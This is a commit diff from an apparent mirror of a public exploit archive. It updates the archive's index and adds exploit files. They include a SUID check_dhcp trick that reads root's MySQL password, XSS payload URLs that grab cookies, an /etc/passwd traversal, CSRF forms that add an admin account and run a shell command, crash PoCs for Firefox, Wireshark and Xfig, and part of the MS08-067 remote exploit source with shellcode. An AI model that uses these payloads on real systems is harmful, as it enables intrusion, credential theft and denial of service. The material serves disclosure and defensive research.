bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_18_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-18 04:35:34 +00:00
parent f648ecf6bd
commit a1eaa87beb
14 changed files with 766 additions and 267 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -6661,7 +6661,7 @@ id,file,description,date,author,platform,type,port
7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload Vulnerability",2008-11-12,ZoRLu,php,webapps,0
7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0
7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0
7104,platforms/windows/remote/7104.c,"MS Windows Server Service Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135
7104,platforms/windows/remote/7104.c,"MS Windows Server Service - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135
7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) Remote SQL Injection Vulnerability",2008-11-12,"Hussin X",php,webapps,0
7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass Vulnerability",2008-11-12,G4N0K,php,webapps,0
7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0
@ -7983,7 +7983,7 @@ id,file,description,date,author,platform,type,port
8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
8479,platforms/windows/dos/8479.html,"MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@ -30095,3 +30095,15 @@ id,file,description,date,author,platform,type,port
33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x Cross-site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0
33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability",2009-11-30,s4r4d0,php,webapps,0
33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS 'categoryid' Parameter Cross Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0
33383,platforms/php/webapps/33383.txt,"Elxis 'filename' Parameter Directory Traversal Vulnerability",2009-11-30,"cr4wl3r ",php,webapps,0
33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - DoS PoC",2014-05-16,"Osanda Malith",windows,dos,0
33385,platforms/php/webapps/33385.txt,"phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0
33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference Vulnerability",2014-05-16,Mr.XHat,multiple,dos,0
33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins <= 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 '.fig' File Buffer Overflow Vulnerability",2009-12-03,pedamachephepto,linux,remote,0
33389,platforms/php/webapps/33389.txt,"EGroupware 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80
33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 404 Error Page Cross Site Scripting Vulnerability",2009-12-04,intern0t,php,webapps,0
33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x 'search.php' Cross Site Scripting Vulnerability",2009-12-07,"aBo MoHaMeD",php,webapps,0
33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0

Can't render this file because it is too large.

189
platforms/linux/local/33387.txt Executable file
View file

@ -0,0 +1,189 @@
=============================================
- Release date: 15.05.2014
- Discovered by: Dawid Golunski
- Severity: Moderate
=============================================
I. VULNERABILITY
-------------------------
check_dhcp - Nagios Plugins <= 2.0.1 Arbitrary Option File Read
II. BACKGROUND
-------------------------
"Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
Nagios Plugins (Official)
The Nagios Plugins Development Team maintains a bundle of more than fifty
standard plugins for Nagios and other monitoring applications that use the
straightforward plugin interface originally invented by the Nagios folks.
Each plugin is a stand-alone command line tool that provides a specific type
of check. Typically, your monitoring software runs these plugins to determine
the current status of hosts and services on your network.
Some of the provided plugins let you check local system metrics (such as load
averages, processes, or disk space usage), others use various network protocols
(such as ICMP, SNMP, or HTTP) to perform remote checks.
This allows for checking a large number of common host and service types.
* check_dhcp plugin
This plugin tests the availability of DHCP servers on a network."
III. INTRODUCTION
-------------------------
check_dhcp plugin that is a part of the official Nagios Plugins package contains
a vulnerability that allows a malicious attacker to read parts of INI
config files belonging to root on a local system. It could allow an attacker
to obtain sensitive information like passwords that should only be accessible
by root user.
The vulnerability is due to check_dhcp plugin having Root SUID permissions and
inappropriate access control when reading user provided config file.
IV. DESCRIPTION
-------------------------
check_dhcp requires a root SUID permission on the program binary file in order to run
correctly. Default installation of check_dhcp when installed from sources assigns
the setuid bit automatically on the file:
# ./configure ; make ; make install
# ls -l /usr/local/nagios/libexec/check_dhcp
-r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp
As we can see in the provided help the plugin allows for reading options from a
supplied config file by using --extra-opts option:
# /usr/local/nagios/libexec/check_dhcp --help
check_dhcp v2.0.1 (nagios-plugins 2.0.1)
...
Usage:
check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
[-i interface] [-m mac]
Options:
...
--extra-opts=[section][@file]
Read options from an ini file. See
https://www.nagios-plugins.org/doc/extra-opts.html
for usage and examples.
The option could be used to read parts of any INI format config files
available on the system. Because check_dhcp is running as root (thanks
to SETUID bit) and does not drop the root privileges when accessing the
config file nor does it check if a given file should be accessible by the
user executing it any root ini-config file can be accessed this way by an
unprivileged user on the local system.
Ironically, the extra-opts.html document states
"The initial use case for this functionality is for hiding passwords, so
you do not have to define sensitive credentials in the Nagios configuration
and these options won't appear in the command line."
V. PROOF OF CONCEPT
-------------------------
A good example of a program that stores configuration in INI format is MySQL.
Administrators often save mysql credentials in /root/.my.cnf to avoid having
to type them each time when running a mysql client. Storing mysql passwords in
a config file is also suggested for safety in MySQL docs :
http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html
An example mysql config file could look like this:
# cat /root/.my.cnf
[mysqldump]
quick
[mysql]
# saved password for the mysql root user
password=myRootSecretMysqlPass123
If an unprivileged attacker had access to a system containing SUID binary of
check_dhcp plugin he could easily use it to retrieve the password contained
in /root/.my.cnf file:
[attacker@localhost ~]$ id
uid=500(attacker) gid=500(attacker) groups=500(attacker)
[attacker@localhost ~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=mysql@/root/.my.cnf
/usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=myRootSecretMysqlPass123'
Usage:
check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
[-i interface] [-m mac]
As we can see the contents of the 'mysql' section of /root/.my.cnf option
file gets printed as a part of the error message revealing its contents to
the attacker.
VI. BUSINESS IMPACT
-------------------------
Malicious user that has local access to a system where check_dhcp plugin is
installed with SUID could exploit this vulnerability to read any INI format
config files owned by root and potentially extract some sensitive information.
VII. SYSTEMS AFFECTED
-------------------------
Systems with check_dhcp SUID binary installed as a part of Nagios Plugins 2.0.1 or older
are vulnerable.
VIII. SOLUTION
-------------------------
Remove SETUID permission bit from the check_dhcp binary file if the plugin is not used.
Vendor has been informed about the vulnerability prior to release of this advisory.
Install a newer version of the plugin when released by vendor.
IX. REFERENCES
-------------------------
http://exchange.nagios.org/directory/Plugins/*-Plugin-Packages/Nagios-Plugins-%28Official%29/details
http://www.nagios-plugins.org/download/nagios-plugins-2.0.1.tar.gz
https://nagios-plugins.org/doc/extra-opts.html
http://en.wikipedia.org/wiki/Setuid
http://en.wikipedia.org/wiki/INI_file
http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html
http://legalhackers.com/advisories/nagios-check_dhcp.txt
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
May 12th, 2014: Advisory created
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

53
platforms/linux/remote/33388.f Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/37193/info
Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Xfig and Transfig 3.2.5 are vulnerable; other versions may also be affected.
PROGRAM XFIG_POC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C XFIG <= 3.2.5B BUFFER OVERFLOW
C TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C WWW.XFIG.ORG
C
C AUTHORS:
C * PEDAMACHEPHEPTOLIONES <pedamachepheptoliones@gmail.com>
C * D.B. COOPER
C
C PROBLEM:
C A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C WHEN READING MALFORMED .FIG FILES
C EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C TEST:
C xfig plane.fig
C fig2dev -L png plane.fig
C (IT DOESN'T HAVE TO BE "PNG")
C
C SOLUTION:
C DON'T TAKE .FIG CANDY FROM STRANGERS
C
C OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
INTEGER I
CHARACTER(LEN=167) :: STR
DO 10 I=1,167
STR(I:I)='Z'
10 CONTINUE
OPEN(11,FILE='plane.fig')
WRITE(11,*) '0 1 2 3'
WRITE(11,*) '4'
WRITE(11,*) '1 2 3 4 5 6 7 '//STR
CLOSE(11)
WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'
END PROGRAM XFIG_POC

42
platforms/multiple/dos/33386.html Executable file
View file

@ -0,0 +1,42 @@
<html>
<title>Mozilla Firefox Null Pointer Dereference Vulnerability</title>
<pre>
Fun side of life!
<br>
Details:
Title: Mozilla Firefox Null Pointer Dereference Vulnerability
Version: Prior to 29.0
Date: 4/30/2014
Discovered By: Mr.XHat
E-Mail: Mr.XHat {AT} GMail.com
Tested On: Windows 7 x64 EN
###################################
Disassembly:
01694240 8bc2 mov eax,edx
01694242 d9e0 fchs
01694244 8b550c mov edx,dword ptr [ebp+0Ch]
01694247 d95c2418 fstp dword ptr [esp+18h]
0169424b 8b1a mov ebx,dword ptr [edx] ds:0023:00000000=????????
0169424d d9442418 fld dword ptr [esp+18h]
01694251 8d4c2420 lea ecx,[esp+20h]
01694255 d9c0 fld st(0)
01694257 51 push ecx
============================================
Output:
(e0.544): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07e1fd00 ebx=0994bf90 ecx=000001f8 edx=00000000 esi=000000a8 edi=00000000
eip=0169424b esp=0012c8f0 ebp=0012c940 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll -
xul!NS_NewLocalFile+0x2a49c:
0169424b 8b1a mov ebx,dword ptr [edx] ds:0023:00000000=????????
#######################################################################################
</pre>
<a href="javascript:_Launch_Website_In_Floating_Window_()"
onclick="window.open('about:blank','1','toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=9999999999,height=9999999999');"
>Crash_Me</a>
<br><br>
I kill you again!
</html>

7
platforms/php/webapps/33383.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37158/info
Elxis is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/includes/feedcreator.class.php?filename=../../../../../../etc/passwd

26
platforms/php/webapps/33385.txt Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/37180/info
phpMyFAQ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to phpMyFAQ 2.5.5 are vulnerable.
http://www.example.com/index.php?action=sitemap&lang=en"><script>alert(1)</script>
http://www.example.com/index.php?search=hello"><script>alert(document.cookie)</script>&action=search
http://www.example.com/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script>
http://www.example.com/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script>
http://www.example.com/index.php?action=sitemap&letter=W&lang=en"><script>alert(1)</script>
http://www.example.com/index.php?action=sitemap&letter=W"><script>alert(1)</script>&lang=en
http://www.example.com/index.php?sid=7&lang=en"><script>alert(document.cookie)</script>&action=show&cat=1
http://www.example.com/index.php?sid=7&lang=en&action=show&cat=1"><script>alert(document.cookie)</script>
http://www.example.com/index.php?action=search&tagging_id=1"><script>alert(1)</script>
http://www.example.com/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script>
http://www.example.com/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script>
http://www.example.com/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en
http://www.example.com/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en
http://www.example.com/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script>
http://www.example.com/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en
http://www.example.com/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en
http://www.example.com/index.php?action=add&question=1&cat=1"><script>alert(1)</script>
http://www.example.com/index.php?action=add&question=1"><script>alert(1)</script>&cat=1

93
platforms/php/webapps/33389.txt Executable file
View file

@ -0,0 +1,93 @@
Advisory ID: HTB23212
Product: EGroupware
Vendor: http://www.egroupware.org/
Vulnerable Version(s): 1.8.006 community edition and probably prior
Tested Version: 1.8.006 community edition
Advisory Publication: April 23, 2014 [without technical details]
Vendor Notification: April 23, 2014
Vendor Patch: May 6, 2014
Public Disclosure: May 14, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352], Code Injection [CWE-94]
CVE References: CVE-2014-2987, CVE-2014-2988
Risk Level: High
CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF and Remote Code Execution vulnerabilities in EGroupware, which can be exploited by remote attacker to gain full control over the application and compromise vulnerable system.
1) ?ross-Site Request Forgery (CSRF) in EGroupware: CVE-2014-2987
The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can create a new user account with administrative privileges by tricking logged-in Groupware administrator to visit a malicious pages with CSRF exploit.
Simple CSRF exploit below creates new administrator with login "immuniweb" and password "immuniweb":
<form action="http://[host]/index.php?menuaction=admin.uiaccounts.add_user" method="post" name="main">
<input type="hidden" name="account_lid" value="immuniweb">
<input type="hidden" name="account_status" value="A">
<input type="hidden" name="account_firstname" value="firstname">
<input type="hidden" name="account_lastname" value="lastname">
<input type="hidden" name="account_passwd" value="immuniweb">
<input type="hidden" name="account_passwd_2" value="immuniweb">
<input type="hidden" name="changepassword" value="1">
<input type="hidden" name="expires" value="2014/04/29">
<input type="hidden" name="never_expires" value="True">
<input type="hidden" name="account_email" value="immuniweb@immuniweb.com">
<input type="hidden" name="account_groups[]" value="-2">
<input type="hidden" name="account_primary_group" value="-2">
<input type="hidden" name="submit" value="Add">
<input type="submit" id="btn">
</form>
2) Code Injection in EGroupware: CVE-2014-2988
The vulnerability exists due to insufficient sanitisation of input data passed via the HTTP POST "newsettings" parameter to PHP function "call_user_func()". A remote attacker with administrative privileges can inject and execute arbitrary PHP code on the target system with privileges of the webserver.
This vulnerability can be exploited in pair with the above-described CSRF vulnerability.
The following exploitation example writes "immuniweb" word into file "/1.php":
<form action="http://[host]/index.php?menuaction=admin.uiconfig.index&appname=phpbrain" method="post" name="main">
<input type="hidden" name="newsettings[system]" value="echo immuniweb>1.php">
<input type="hidden" name="submit" value="Save">
<input type="submit" id="btn">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Update to EGroupware version 1.8.007
More Information:
http://www.egroupware.org/forum#nabble-td3997580
http://www.egroupware.org/changelog
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23212 - https://www.htbridge.com/advisory/HTB23212 - CSRF and Remote Code Execution in EGroupware.
[2] EGroupware - http://www.egroupware.org/ - EGroupware is the leading open source collaboration tool and the top choice for big enterprises, SMEs and teams within and across organizations all over the globe.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

10
platforms/php/webapps/33390.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37209/info
Yoast Google Analytics for WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects version 3.2.4 of the plugin.
http://www.example.com/wp/?s=</script><script>alert(0)</script>
http://www.example.com/wp/?s=");alert(0);document.write("

9
platforms/php/webapps/33391.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37233/info
YABSoft Advanced Image Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Advanced Image Hosting Script 2.2 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?text=%3Cscript%3Ealert(document.cookie)%3C/script%3E&dosearch=Search

9
platforms/php/webapps/33392.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37239/info
The Warp5 component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(12346)%3B%3C/ScRiPt%3E
http://www.example.com/index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00&#039;%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
The GET variable yt_color can be set to "+onmouseover=alert(123456)+

9
platforms/php/webapps/33393.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37260/info
The Joomla! You!Hostit! template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
You!Hostit! template 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/path/?created_by_alias=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E&title=111-222-1933andresg888@gmail.com&text=111-222-1933andresg888@gmail.com&Submit=Submit

10
platforms/php/webapps/33394.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37263/info
Invision Power Board is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Invision Power Board 2.0 through 3.0.4 are vulnerable. Other versions may also be affected.
<span onmouseover="javascript:alert('XSS');function
fakeLoginPage(){...}">move your mouse pointer here</span>

30
platforms/windows/dos/33384.py Executable file
View file

@ -0,0 +1,30 @@
#!/usr/bin/python
# Exploit Title: Wireshark Read Access Violation near NULL starting at libcairo_2!cairo_image_surface_get_data()
# Date: May 15th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<[at]>gmail.com
# Version: 1.10.7 32-bit and 64-bit
# Vendor Homepage: http://www.wireshark.org
# Tested on: Windows 8 64-bit
'''
The issue is with the cairo_image_surface_get_data() function in Cairo.
These fields are vulnerable:
- Filter text box
- Statistics -> IP DESTINATIONS
- Statistics -> IP Addresses
Paste the generated text in any one of above fields and hit return.
'''
payload = "A" * 50000
file = open('exploit.txt', "w")
file.write(payload)
file.close()
'''
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Wireshark32\libcairo-2.dll -
eax=00000000 ebx=052dabf0 ecx=77bc2ad2 edx=612fc6e0 esi=00000000 edi=612fc6e0
eip=61291737 esp=008cdca0 ebp=00000000 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
libcairo_2!cairo_image_surface_get_data+0x7:
61291737 8138609d2f61 cmp dword ptr [eax],offset libcairo_2!cairo_tee_surface_index+0xd080 (612f9d60) ds:002b:00000000=????????
'''

530
platforms/windows/remote/7104.c
View file

@ -1,265 +1,265 @@
/*
MS08-067 Remote Stack Overflow Vulnerability Exploit
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28
*/
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
